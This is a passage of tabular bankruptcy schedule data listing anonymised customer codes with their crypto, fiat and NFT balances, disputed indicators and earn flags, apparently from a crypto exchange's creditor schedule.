| 07406608 | | CUSDT[4], DOGE[33.08901847], USD[0.00], USDT[0.00000001] | | |
| 07406611 | | BRZ[2], CUSDT[4], DOGE[.0000368], ETH[.00000003], ETHW[.0000003], TRX[2], USD[0.02] | | |
| 07406618 | | BAT[0], DOGE[146.28387452], ETH[0.00613243], ETHW[0.00605029], SHIB[2], SOL[0.97404987], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07406629 | | BRZ[1], DOGE[10], UNI[0], USD[0.00] | | |
| 07406635 | | BRZ[1], CUSDT[757.10323371], TRX[190.25507773], USD[0.01] | | |
| 07406636 | | CUSDT[3], DOGE[166387.10521597], TRX[2], USD[0.00], USDT[0] | | |
| 07406637 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07406641 | | CUSDT[3], DOGE[1], USD[0.01] | | |
| 07406644 | | NFT [300083285050248307/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #117][1], NFT [406676193836855150/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #47][1], USD[0.00] | Yes | |
| 07406651 | | USD[0.01] | | |
| 07406652 | | CUSDT[1], DOGE[7764.48403329], SHIB[6922077.28953372], USD[0.00], USDT[0] | Yes | |
| 07406659 | | BAT[1.0165555], DOGE[1], TRX[11589.4620237], USD[0.00] | Yes | |
| 07406661 | | ETH[.0003509], ETHW[0.00035089], USD[0.01], USDT[0] | | |
| 07406666 | | BTC[0], USD[169.82], USDT[0] | Yes | |
| 07406671 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07406673 | | USD[0.01] | | |
| 07406674 | | BAT[3], BRZ[1], DOGE[2], GRT[3], LINK[2], MATIC[1], NFT [300600121842157653/Starry Night #404][1], NFT [426566082669543207/Miami Ticket Stub #446][1], NFT [492173800675705429/Barcelona Ticket Stub #757][1], SUSHI[2], TRX[2], UNI[1], USD[4225.25] | | |
| 07406676 | | BAT[.75546678], BTC[0], SHIB[1598400], USD[3.22] | | |
| 07406677 | | BRZ[1], CUSDT[11], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07406681 | | SOL[5.215041], USD[0.74], USDT[0.00000058] | | |
| 07406686 | | AAVE[.0089], ETHW[.00065], NFT (476032192421362227/Entrance Voucher #29610)[1], TRX[.000004], USD[973.15], USDT[0.00000001] | | |
| 07406690 | | BTC[.00010127], CUSDT[4], DOGE[142.67648161], LTC[2.01332273], SUSHI[2.0558332], USD[0.01] | | |
| 07406692 | | BRZ[2], DOGE[2], TRX[2], USD[0.00] | | |
| 07406704 | | BRZ[1], CUSDT[1], DOGE[5], USD[0.00] | | |
| 07406705 | | AAVE[.5282939], AUD[0.98], BAT[1.01651242], BRZ[3], CUSDT[7], DOGE[5427.18493138], GRT[723.20982209], SHIB[2], SOL[45.84684998], SUSHI[32.30779423], TRX[5], USD[0.66] | Yes | |
| 07406706 | | BRZ[1], USD[0.00] | | |
| 07406707 | | DOGE[1], USD[0.00] | | |
| 07406709 | | BTC[.00548626], CUSDT[.09503881], DOGE[1], GRT[1.00498957], KSHIB[4114.53042304], NFT (298142226641954822/Entrance Voucher #2055)[1], TRX[.01256453], USD[764.36] | Yes | |
| 07406710 | | ALGO[16], AVAX[0], BTC[0], LINK[.044], SOL[0], USD[0.00], USDT[.0511882] | | |
| 07406715 | | DOGE[2], GRT[1.0025734], TRX[1], USD[53.43] | Yes | |
| 07406718 | | BTC[0.00438206], DOGE[0], ETH[0], LTC[0], SOL[0.52036620], SUSHI[0], TRX[0.00699966], USD[126.34], USDT[0] | | |
| 07406725 | | SOL[2.0979], SUSHI[1.52155376], USD[0.32] | | |
| 07406726 | | USD[61.45], USDT[0] | | |
| 07406727 | | BRZ[1], USD[0.00] | | |
| 07406732 | | BAT[8.41532369], BRZ[5.04891894], BTC[.0005438], CUSDT[3], DOGE[8.18833654], ETH[.00000491], ETHW[17.50000000], GRT[4.09351169], MATIC[1.00154029], NFT (319593986250016465/SKYLINE #3112)[1], NFT (355389915828822285/Woodie #5081)[1], NFT (381033063671198298/The Tower #25-13)[1], NFT (383381273727534210/The Tower #169-18)[1], NFT (400278929834535333/The Tower #153-19)[1], NFT (421094407177675497/The Tower #214-7)[1], NFT (426853340201268172/The Tower #13-11)[1], NFT (441965985054864753/The Tower #215-12)[1], NFT (505088214068141172/The Tower #9-1)[1], NFT (539185379402089061/The Tower #134-13)[1], SOL[0.80219140], SUSHI[1.05898765], TRX[13.01088518], UNI[2.09995151], USD[44.81], USDT[4.21772288] | Yes | |
| 07406734 | | CUSDT[2], ETH[6.57851659], ETHW[6.57576021], USD[0.00] | Yes | |
| 07406738 | | CUSDT[4], DOGE[.99997374], TRX[2.48991524], USD[0.60] | | |
| 07406765 | | BTC[.00009073], MATIC[0], SHIB[20025221.06463689], USD[0.00], USDT[0] | | |
| 07406770 | | BRZ[57.66840604], BTC[.04042716], CUSDT[21], DOGE[279.31206901], ETH[1.33344794], ETHW[1.33344794], SHIB[10], SOL[3.75422059], TRX[5], USD[0.00] | | |
| 07406772 | | CUSDT[1], TRX[2], USD[0.00] | Yes | |
| 07406773 | | USD[0.00] | | |
| 07406776 | | DOGE[1], USD[0.00], YFI[.00370061] | | |
| 07406777 | | BTC[0.00035000], DOGE[.6242], ETH[0], MATIC[9.508], SHIB[25700], SOL[0.00247000], USD[0.12], USDT[0] | | |
| 07406778 | | USD[0.00] | | |
| 07406779 | | BCH[0], BTC[0], DOGE[0], ETH[0], NFT (433931470190333454/Saudi Arabia Ticket Stub #1804)[1], SOL[2.09113514], TRX[.000097], USD[0.00], USDT[0.00000045] | | |
| 07406784 | | BRZ[1], BTC[.00182928], CUSDT[5], TRX[2], USD[0.00] | | |
| 07406792 | | DOGE[1117.61454504], USD[55.35] | Yes | |
| 07406798 | | DOGE[188.76575698], USD[0.00] | | |
| 07406801 | Contingent, Disputed | USDT[1.9924] | | |
| 07406812 | | DOGE[114.16908224], USD[0.00] | | |
| 07406814 | | SUSHI[.16935822], USD[0.05] | | |
| 07406817 | | AAVE[0], BAT[0], BCH[0], BRZ[1], BTC[0], CUSDT[5], DOGE[0], ETH[0], ETHW[0], LTC[0], MKR[0], SOL[0], TRX[0], USD[0.00], USDT[0.00100696] | Yes | |
| 07406820 | | BRZ[2], CUSDT[2], DOGE[451.31814172], USD[0.40], USDT[1] | | |
| 07406829 | | ETH[0.03000000], ETHW[0.03000000], SOL[0], USD[0.00], USDT[0.22147219] | | |
| 07406839 | | BRZ[1], SHIB[1], USD[0.01], USDT[0] | | |
| 07406843 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.24] | | |
| 07406846 | | BCH[0], BTC[0], CUSDT[0.00818756], DOGE[0], ETH[0], ETHW[0.00042303], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07406849 | | DOGE[1], UNI[4.09095087] | | |
| 07406851 | | CUSDT[1], DOGE[1], USD[0.00], USDT[1] | | |
| 07406856 | | CUSDT[2], DOGE[1070.65217148], SHIB[1772246.64201399], TRX[2], USD[0.00] | | |
| 07406860 | | USD[0.00], USDT[109.87305609] | | |
| 07406864 | | USD[0.00] | | |
| 07406866 | | USD[0.01] | | |
| 07406877 | | ETH[.00030761], ETHW[.00030761], USD[0.01] | | |
| 07406879 | | CUSDT[2], DOGE[2], USD[157.20] | | |
| 07406883 | | USD[0.00], USDT[0] | | |
| 07406891 | | BRZ[4], BTC[.03400155], CUSDT[13], DOGE[5721.09595834], SHIB[4745866.48482406], TRX[7], USD[1.42], USDT[2.19723889] | Yes | |
| 07406892 | | CUSDT[4724.50334235], DOGE[11926.00210709], TRX[1], USD[0.00] | | |
| 07406893 | | CUSDT[3], DOGE[6.00015637], TRX[2], USD[0.01], USDT[0] | | |
| 07406896 | | DOGE[0] | | |
| 07406903 | | ETH[.00000001], ETHW[0.64167074], SOL[0], USD[0.22] | | |
| 07406905 | | USDT[0] | | |
| 07406910 | | CUSDT[6], SHIB[1], TRX[1], USD[0.01] | | |
| 07406915 | | BRZ[1], CUSDT[3], SHIB[1], SUSHI[.10138562], TRX[1], USD[461.01] | Yes | |
| 07406917 | | BAT[1], BRZ[1], DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07406924 | | BTC[0], SOL[0], USDT[0.00034436] | | |
| 07406925 | | BAT[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07406927 | | BTC[0], DOGE[0], ETH[.00000001], USDT[.10655532] | | |
| 07406932 | | USD[0.00], USDT[.00036383] | | |
| 07406935 | | CUSDT[6], MATIC[.00006153], SOL[.00000082], TRX[1], USD[0.00] | Yes | |
| 07406940 | | BTC[0], CUSDT[0], DOGE[0], ETH[0], LTC[0.00000068], SOL[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07406941 | | SOL[.0096105], USD[539.62] | | |
| 07406942 | | BTC[.00033207], CUSDT[1], SOL[.00000002], TRX[1], USD[0.00] | Yes | |
| 07406947 | | BAT[2], BRZ[4], CUSDT[8], DOGE[8], GRT[1], TRX[7], USD[17.48], USDT[4] | | |
| 07406948 | | CUSDT[2], DOGE[0.00001502], TRX[1.00004904], USD[0.64], YFI[0] | | |
| 07406952 | | BAT[2.1208815], ETH[0.01015873], ETHW[0.01003561], SOL[0], USD[0.00], USDT[0.00002183] | Yes | |
| 07406955 | | ETH[.00012556], ETHW[0.00012556], USD[0.73] | | |
| 07406959 | | BRZ[1], CUSDT[1], GRT[1], TRX[1], USD[0.00] | | |
| 07406961 | | BRZ[2], CUSDT[25], DOGE[4.02183096], ETH[.00000001], ETHW[0], GRT[1.00498957], USD[0.00], USDT[1.10646294] | Yes | |
| 07406975 | | BTC[.00004139], SUSHI[.432], USD[0.00] | | |
| 07406978 | | USD[0.00], USDT[3.22598483] | | |
| 07406987 | | BAT[1], BRZ[1], CUSDT[15], DAI[.50039953], SHIB[1], TRX[4], USD[0.00] | | |
| 07406988 | | USD[0.00] | | |
| 07406993 | | SOL[.0428], SUSHI[0.08600000], USD[2.53] | | |
| 07406996 | | DOGE[0], USD[0.00], USDT[0.05956710] | | |
| 07406998 | | DOGE[2243.93715402], SHIB[1079260.76416141], USD[0.00] | Yes | |
| 07406999 | | BTC[.17494598], CUSDT[2], DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07407004 | | DOGE[1.00025873], USD[0.01] | | |
| 07407005 | | USD[3.05] | | |
| 07407006 | | CUSDT[1], DOGE[.00004257], SHIB[244639.39907278], TRX[1], USD[0.05] | | |
| 07407007 | | USD[6.78] | | |
| 07407008 | | USD[0.35] | | |
| 07407020 | Contingent, Disputed | BTC[.00149197], CUSDT[7], DOGE[129.78195535], ETH[.01292555], ETHW[.01292555], SGD[0.00], SOL[.75302665], TRX[94.99486671], USD[0.00] | | |
| 07407022 | | CUSDT[2], DOGE[8], TRX[3], USD[0.07] | | |
| 07407026 | | BTC[0.32101114], DOGE[.8512], USD[2.67] | | |
| 07407028 | | SOL[196.98867627], SUSHI[326.13926699], USD[1.59] | Yes | |
| 07407030 | Contingent, Disputed | BTC[25.89730604], SOL[3481.0155] | | |
| 07407035 | | USD[0.01], USDT[0] | | |
| 07407036 | | SOL[0.35342987], USD[0.98] | | |
| 07407041 | | ETH[0.07093000], ETHW[0.07093000], SOL[.000441], UNI[5.997], USDT[.2706149] | | |
| 07407050 | | ETHW[0.00088589], NFT (378955200752147876/WanderPack - Vantage Sudo)[1], USD[0.00] | | |
| 07407051 | | BAT[3], BRZ[4], CUSDT[4], DOGE[9], ETH[5.00002097], ETHW[5.00002097], GRT[2], SUSHI[1], TRX[5], UNI[1], USD[0.00], USDT[1] | | |
| 07407052 | | BRZ[4.81295852], CUSDT[1], DOGE[3], NFT (308399794141087166/Astral Apes #3076)[1], NFT (486054406662151608/Fancy Frenchies #1711)[1], SOL[11.72847248], TRX[18.20359586], USD[5690.56] | Yes | |
| 07407055 | | BTC[0], NFT (495215599708498964/Unity #380)[1], NFT (556601804103853891/Unity #270)[1], USD[0.00] | | |
| 07407058 | | BTC[0.00000002], ETH[0], USD[0.00], USDT[0] | Yes | |
| 07407065 | | BTC[0], DOGE[0], ETH[0.07853437], ETHW[0.07853437], LINK[0], LTC[0], SOL[6.17769832], SUSHI[12.32035095], TRX[0], USD[0.00] | | |
| 07407066 | | USD[0.00] | | |
| 07407067 | | BTC[.0000911], ETH[.000337], ETHW[.000337], USD[18.92] | | |
| 07407070 | | CUSDT[285.02823998], DOGE[508.88757582], TRX[76.48767377], USD[0.00] | | |
| 07407073 | | BTC[0] | | |
| 07407074 | | SOL[.93597015], USDT[0.00000007] | | |
| 07407076 | | ETHW[0], USD[0.00] | | |
| 07407079 | | CUSDT[2], DOGE[270.44864805], TRX[1], USD[0.00] | Yes | |
| 07407081 | | CUSDT[5239.79502025], DOGE[4.05213569], USD[0.00] | Yes | |
| 07407084 | | TRX[1], USD[0.00] | | |
| 07407092 | | BAT[0], BTC[0], DAI[0], DOGE[0.49749572], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[1121.39946888], UNI[0], USD[0.07], USDT[0] | | |
| 07407096 | | USD[0.00] | | |
| 07407100 | | DOGE[0], GRT[1.04367329], LTC[0], USDT[0.00000001] | | |
| 07407105 | | BAT[3.72641557], SOL[0], USD[0.00], USDT[0] | | |
| 07407106 | | USD[0.00] | | |
| 07407108 | | BRZ[1], CUSDT[1], DOGE[1], GRT[0], LINK[5.17247001], TRX[1], USD[0.00] | | |
| 07407112 | | SOL[8.484], USD[1.76] | | |
| 07407120 | | BTC[0], ETH[0], NFT (303444086393579272/FDT)[1], NFT (370866924731609605/rajdesaicpa.eth)[1], USD[0.00] | | |

Amended Schedule F Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07407121 | | USD[3.95] | | |
| 07407122 | | BRZ[1], BTC[.00348715], CUSDT[7], DOGE[.09427788], ETH[.05599965], ETHW[.05530146], LINK[5.6286617], MATIC[.00143464], SHIB[1503.10899792], SOL[1.0923763], TRX[1], USD[0.00] | Yes | |
| 07407123 | | DOGE[0], ETH[0], ETHW[0], SHIB[6281.21572602], USD[0.00], USDT[0] | | |
| 07407124 | | USD[6.32] | | |
| 07407135 | | USDT[4.4162] | | |
| 07407136 | | SOL[44.09317438], TRX[1], USD[0.00] | | |
| 07407138 | | CUSDT[1], DOGE[0.74379736], ETH[0.00000038], ETHW[0.00000038], USD[0.00], USDT[0] | Yes | |
| 07407139 | | BTC[0], ETH[0], ETHW[0], NFT (288640485970480360/2974 Floyd Norman - OKC 3-0135)[1], NFT (422387045760648833/NFT)[1], SOL[0.00879284], USD[1.44] | | |
| 07407143 | | BTC[0], ETH[.085], NFT (467677784144722979/Kiddo #876)[1], NFT (476580735729899439/Cool Bean #1379)[1], USD[0.88], USDT[0] | | |
| 07407146 | | BRZ[1], CUSDT[6], DOGE[.00002863], TRX[.00004108], USD[0.01] | | |
| 07407153 | | USD[23.99] | | |
| 07407157 | | DOGE[1], TRX[1], USD[0.01], USDT[0] | | |
| 07407158 | | ETH[.09699577], ETHW[.09699577], TRX[1], USD[0.00] | | |
| 07407160 | | BTC[0], CUSDT[5], LTC[0], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.96] | Yes | |
| 07407161 | | BRZ[3], DOGE[2], ETHW[4.29999194], TRX[1], USD[9199.46] | Yes | |
| 07407165 | | USD[1.69] | | |
| 07407173 | | ETH[0], ETHW[0], NFT (324160429260017928/Entrance Voucher #3997)[1], SOL[0], USD[0.00] | | |
| 07407174 | | TRX[.000028], USD[0.00], USDT[0] | | |
| 07407178 | | BRZ[1], CUSDT[2], DOGE[82.3623914], ETH[.2892514], ETHW[.28905868], TRX[1], USD[78.83] | Yes | |
| 07407180 | | USD[100.00] | | |
| 07407183 | | BCH[0], DOGE[0], SOL[0], USD[0.00] | | |
| 07407185 | | SOL[.01] | | |
| 07407186 | | BTC[.0001], USD[0.76] | | |
| 07407187 | | BAT[1.01175269], BRZ[2], CUSDT[2], DOGE[6.01723439], GRT[1], TRX[7], USD[5000.00], USDT[0] | Yes | |
| 07407188 | | BTC[0], DOGE[0], ETH[0], GRT[0], MATIC[0], SOL[0], TRX[0], USD[0.35] | | |
| 07407192 | | CUSDT[532.17012088], DOGE[1085.58248989], LINK[2.06102011], LTC[.00576693], SHIB[404275.52034218], SOL[.00394833], SUSHI[2.03383103], TRX[296.98876931], USD[0.05] | | |
| 07407193 | | UNI[.25797505] | | |
| 07407195 | | ETH[.00018], ETHW[.00018], SHIB[3700000], USD[2.10], USDT[.000038] | | |
| 07407197 | | ETH[.00000001], ETHW[0], USD[2.03], USDT[0.31100000] | | |
| 07407198 | | BAT[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USDT[0.00001881] | | |
| 07407199 | | AAVE[0], AUD[0.00], BTC[0], DOGE[0], ETH[0], GBP[0.00], LTC[0], MATIC[1.80069618], SOL[0.00606000], SUSHI[0.39450000], TRX[0], USD[820.41], USDT[0] | | |
| 07407202 | | SHIB[3], USD[0.07] | | |
| 07407204 | | DOGE[122.7363801], USD[0.00] | | |
| 07407206 | | USD[0.00] | | |
| 07407208 | | BRZ[1], BTC[.00736888], CAD[1.29], CUSDT[4071.68927161], DOGE[610.46976172], ETH[.00536617], ETHW[.00529772], PAXG[.00068097], SHIB[1], SOL[.10329056], TRX[38.30549444], UNI[.1661284], USD[0.00], USDT[.99477822], YFI[.00008674] | Yes | |
| 07407210 | | ETH[0], ETHW[0] | | |
| 07407216 | | USD[3.94] | | |
| 07407218 | | USD[0.00] | | |
| 07407220 | | BTC[.000071] | | |
| 07407223 | | DOGE[0], GRT[0], TRX[0], USD[0.00] | | |
| 07407225 | | DOGE[0], USD[8.36] | Yes | |
| 07407226 | | CUSDT[2], ETH[.03572092], ETHW[.03572092], LTC[.3008303], USD[0.00] | | |
| 07407227 | | USD[350.88], USDT[0.00000001] | | |
| 07407228 | | SOL[.22], USD[2.18] | | |
| 07407234 | | SOL[.0072], USD[508.04], USDT[0.00000001] | | |
| 07407235 | | DOGE[1], GRT[50.77444277], USD[0.00] | | |
| 07407237 | | BRZ[1], BTC[.29100538], DOGE[2], ETH[1.44059266], ETHW[1.43998766], TRX[1], USD[0.01] | Yes | |
| 07407242 | | USD[0.00] | | |
| 07407243 | | BAT[1], BTC[.09099709], CUSDT[3], DOGE[3], ETH[1.73397757], ETHW[1.73323354], GRT[1], SOL[89.91118269], TRX[4], USD[112.27] | Yes | |
| 07407244 | | BTC[0], ETH[0], USD[0.00] | | |
| 07407246 | | BTC[.0000656], ETHW[.999], LINK[54.7392], USD[3501.89] | | |
| 07407247 | | BTC[0], DOGE[5.03327], TRX[1], USD[0.00] | Yes | |
| 07407253 | | BTC[0], ETH[0], GRT[.00000001], SOL[0], SUSHI[.00000001], USD[3.78] | | |
| 07407259 | | USD[13.23] | | |
| 07407265 | | DOGE[0], LTC[2.29843763], TRX[2], UNI[45.74903883], USD[100.00] | | |
| 07407266 | | BTC[0], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07407267 | | NFT (403958565361377559/Sigma Shark #3459)[1], SOL[.0884], USD[2000.00] | | |
| 07407271 | | BTC[.00009982], ETH[.00017901], ETHW[.00017900], LTC[.00391584], SOL[.0774], YFI[.000978] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07407272 | Contingent, Disputed | BTC[.00376727], USD[47.08] | | |
| 07407273 | | SOL[0] | | |
| 07407282 | | BTC[0.00168662], DOGE[0], ETH[.00000001], ETHW[0], SOL[0], USD[0.01], USDT[0], YFI[0] | | |
| 07407292 | | ETHW[2.183], USD[9600.45] | | |
| 07407293 | | ETH[.00000002], USD[0.01], USDT[0] | | |
| 07407295 | | SUSHI[24.86886731], USD[0.00] | | |
| 07407296 | | CUSDT[5], DOGE[14601.12227817], TRX[1.89], USD[0.01] | Yes | |
| 07407301 | | BTC[0], DOGE[21.39856846], USD[0.00], USDT[0] | | |
| 07407304 | | SOL[0], USDT[0.00000863] | | |
| 07407305 | | CUSDT[3], USD[0.00] | | |
| 07407307 | | BAT[1], BRZ[1], CUSDT[4], DOGE[.00302833], ETHW[1.22883875], SHIB[1], TRX[4], UNI[1.06873338], USD[0.89], USDT[1.06872432] | Yes | |
| 07407308 | | BAT[4.17289486], BRZ[5], CUSDT[2], DOGE[1], ETH[1.67774215], ETHW[1.67714356], GRT[3.07571955], LTC[.43443677], SHIB[3], TRX[7], USD[10323.56], USDT[1.06800353] | Yes | |
| 07407309 | | BTC[.00005], DOGE[.664], SOL[0.07840000], TRX[.188], USD[1.25], USDT[0] | | |
| 07407311 | | ETHW[.00098352], LTC[.00866066], USD[0.26] | Yes | |
| 07407313 | | BRZ[1], CUSDT[4], TRX[1], USD[0.43] | | |
| 07407318 | | GRT[1], USD[0.00] | | |
| 07407321 | | USD[100.00] | | |
| 07407329 | | AVAX[0], BTC[0], DOGE[0], ETH[0], ETHW[0], NFT (384044947365625166/Humpty Dumpty #1082)[1], NFT (41421761259535642B/Juliet #434)[1], SOL[0], SUSHI[0], TRX[0], USD[7.94] | | |
| 07407330 | Contingent, Disputed | BTC[.02602617], DOGE[1], USD[740.85] | | |
| 07407336 | | BRZ[1.04539162], BTC[.00000007], CUSDT[3], DOGE[.003514], USD[0.31] | | |
| 07407337 | | BTC[0.00002620], SUSHI[.3045], USD[0.01] | | |
| 07407340 | | BAT[1.01514482], BRZ[2], BTC[0], CUSDT[2], DOGE[6.14444331], GRT[4.20392695], SOL[0], TRX[4], USD[0.00], USDT[5.47136248] | Yes | |
| 07407346 | | DOGE[2], GRT[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07407349 | | BRZ[1], CUSDT[13], SHIB[6], USD[0.81] | Yes | |
| 07407359 | | USD[0.00], USDT[0] | | |
| 07407360 | | BAT[0], BTC[0], SOL[0], SUSHI[0], TRX[0], USD[9.62], USDT[0] | | |
| 07407361 | | NFT (304898895459114826/Phoenix Julia  #8)[1], NFT (318522383733435466/Valley #10)[1], NFT (324655602488968285/Phoenix Julia  #5)[1], NFT (331680847409969454/Alice #9)[1], NFT (367982221304190307/Phoenix Julia  #6)[1], NFT (368034924839193663/Phoenix Julia  #2)[1], NFT (375409405385970153/Phoenix Julia  #2)[1], NFT (408399723228142004/Phoenix Julia  #10)[1], NFT (412617464104066246/Valley #9)[1], NFT (413016373634115335/Phoenix Julia  #9)[1], NFT (416036499058156725/Alice #3)[1], NFT (417443732942292797/Phoenix Julia  #4)[1], NFT (446393231978141341/Fractal Studio - Island #9)[1], NFT (447239358875641878/Fractal Studio - Island #4)[1], NFT (461675346914462064/Fractal Studio - Island #8)[1], NFT (462256452991367667/Alice #4)[1], NFT (481112437910352333/Alice #5)[1], NFT (543802004832598215/Phoenix Julia  #3)[1], NFT (549155326530626373/Alice #10)[1], NFT (554541858998746017/Alice #7)[1], NFT (569742581782686751/Alice #6)[1], NFT (569780620166276144/Phoenix Julia  #7)[1], USD[4177.46] | | |
| 07407380 | | USD[333.00] | | |
| 07407382 | | BTC[.207771], ETH[2.115804], ETHW[2.115804], USD[3.61] | | |
| 07407386 | | USD[31.24] | Yes | |
| 07407387 | | ETH[0], ETHW[0], SOL[0], USD[1.15] | | |
| 07407391 | | BTC[0], ETHW[.65595], NFT (311347304445047437/Season 1 #1)[1], USD[1.11], USDT[0] | | |
| 07407394 | | BAT[2], BTC[.0695346], ETH[1.27308112], ETHW[1.27254648], GRT[1], SHIB[1], TRX[1], USD[757.60] | Yes | |
| 07407395 | | DOGE[2], SOL[7.59237945], USD[0.00] | Yes | |
| 07407402 | | ETH[0], SOL[.0167569], USD[0.00], USDT[0.00000001] | | |
| 07407406 | | BTC[0.00000615], ETHW[.015201], GRT[10.706], USD[15001.50], USDT[0.00286250] | | |
| 07407409 | | USD[1.32] | | |
| 07407411 | | USD[0.06] | | |
| 07407415 | | SOL[0], TRX[1], USD[2046.99] | | |
| 07407417 | | BAT[.785], GRT[2772.225], NFT (495330750527516175/Coachella x FTX Weekend 2 #9700)[1], SOL[112.887], SUSHI[.46], USD[2.58] | | |
| 07407418 | Contingent, Disputed | BRZ[3], CUSDT[2], TRX[2], USD[0.00] | | |
| 07407422 | | BRZ[2], CUSDT[4], USD[0.00], USDT[1] | | |
| 07407424 | | USD[0.13] | | |
| 07407426 | | BTC[5.46369804], SOL[1076.22700640], USD[0.00], USDT[0.00001201] | | |
| 07407428 | | USD[0.00] | | |
| 07407430 | | ETH[0], USD[0.00], USDT[0] | | |
| 07407434 | | BRZ[1], DOGE[1], USD[342.32] | | |
| 07407435 | | SUSHI[.42870349], UNI[.0981], USD[0.00] | | |
| 07407437 | | CUSDT[1], SUSHI[6.80194249], USD[0.00] | | |
| 07407440 | | NFT (414296493723914039/Lunarian #210)[1], USD[0.72], USDT[0] | | |
| 07407447 | | BTC[0], DOGE[10.22640074], ETH[0.00000001], ETHW[0.23046639], SOL[0.00890806], USD[17938.26] | | |
| 07407449 | | BRZ[0], USD[0.00], USDT[0.00038108] | | |
| 07407452 | | USD[0.04], USDT[0] | | |
| 07407460 | | TRX[1], USD[0.00] | Yes | |
| 07407462 | | GRT[1.998], SOL[8.95355], USD[155.09] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07407465 | | ETHW[1.30792416], USD[1.75] | | |
| 07407469 | Contingent, Disputed | BTC[.02573445], DOGE[1], USD[745.90] | | |
| 07407473 | | BTC[0.06621363] | | |
| 07407475 | | TRX[1], USD[47.02] | | |
| 07407477 | | ETH[0], SOL[0], USD[415.64], USDT[0.00000008] | | |
| 07407481 | | BTC[0.00002538], SOL[0.00251573], USD[0.01], USDT[.048498] | | |
| 07407482 | | BRZ[1], DOGE[1], GRT[1.00367791], USD[0.00] | Yes | |
| 07407491 | | USD[0.00] | | |
| 07407492 | | SOL[0], USD[0.00] | | |
| 07407495 | | SOL[.0374], USD[9.63] | | |
| 07407496 | | BRZ[4], CUSDT[2], DOGE[10], TRX[6], USD[5.85], USDT[0] | | |
| 07407500 | | BTC[.00248958], DOGE[6], SOL[39.06534944], TRX[1], USD[0.00], USDT[1] | | |
| 07407503 | | USD[0.00] | | |
| 07407512 | | AVAX[0], BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], MATIC[0], MKR[0], SOL[0], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07407515 | | USD[0.07] | | |
| 07407519 | | DOGE[2], GBP[17.56], PAXG[.02683839], SOL[1.50591532], TRX[1], USD[5.00] | | |
| 07407521 | | CUSDT[1], DOGE[0], ETH[0], USD[0.00] | Yes | |
| 07407524 | | BAT[11.02053702], BRZ[3], CUSDT[11], DOGE[2], SOL[.00001874], TRX[13.32081838], USD[0.00], USDT[0] | Yes | |
| 07407525 | | BAT[2], CUSDT[3], ETH[0.00002614], ETHW[0.00002614], LINK[.00002258], SUSHI[.00002014], TRX[1], USD[0.00] | | |
| 07407533 | | DOGE[4], USD[0.00] | | |
| 07407534 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07407536 | | CUSDT[83.01955424], USD[0.50], USDT[0] | | |
| 07407538 | | BTC[0], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07407542 | | BTC[0], ETHW[.0004085], SOL[.00000001], UNI[.0646], USD[0.83], USDT[0] | | |
| 07407545 | | BRZ[1], BTC[.01063822], CUSDT[1], SUSHI[0], USD[0.01], YFI[0] | | |
| 07407546 | | ETH[.00000001], SOL[0.00000001], USD[4625.78] | | |
| 07407547 | | BTC[0.00007700], ETH[.00077364], ETHW[.00077364], TRX[.6886], USD[32.76], USDT[5.67271672] | | |
| 07407550 | | SOL[.668], USD[0.12] | | |
| 07407553 | | ETHW[.031968], TRX[.00001], USD[0.00], USDT[1.12058122] | | |
| 07407554 | | BTC[0], ETH[0], LTC[0.00871000], SOL[0], USDT[0] | | |
| 07407555 | | BTC[.000058], USD[41.99] | | |
| 07407561 | | USD[4.03] | | |
| 07407565 | | BTC[.0000044], ETH[0.00076115], ETHW[0.00076115], USD[0.81] | | |
| 07407567 | | BCH[0], SOL[0], USD[0.00] | | |
| 07407581 | | AVAX[0.00000001], BTC[0], ETH[0], USD[1.99], USDT[.004218] | | |
| 07407585 | | NFT [536597262587415798/Surging Josephs #228][1] | | |
| 07407591 | | LTC[0], SOL[0], USD[0.00] | | |
| 07407592 | | BAT[1.0078939], CUSDT[19.05628698], DOGE[0], KSHIB[0], TRX[7], USD[0.00] | | |
| 07407597 | | BTC[.02657585], ETH[.36475732], ETHW[.36475732], GRT[572.24027223], MATIC[313.26889485], SOL[76.42827341], USD[3.10], USDT[7.00099988], YFI[.00002712] | | |
| 07407599 | | TRX[.000001] | | |
| 07407600 | | BTC[0], CUSDT[4], DOGE[1], GRT[1], TRX[6], USD[0.00] | | |
| 07407601 | | BTC[0.15718950], ETH[4.79471123], ETHW[3.27321123], UNI[5.6748], USD[0.57], USDT[0.00000001] | | |
| 07407602 | | BTC[.00019159], SOL[.00273379], USD[0.00] | | |
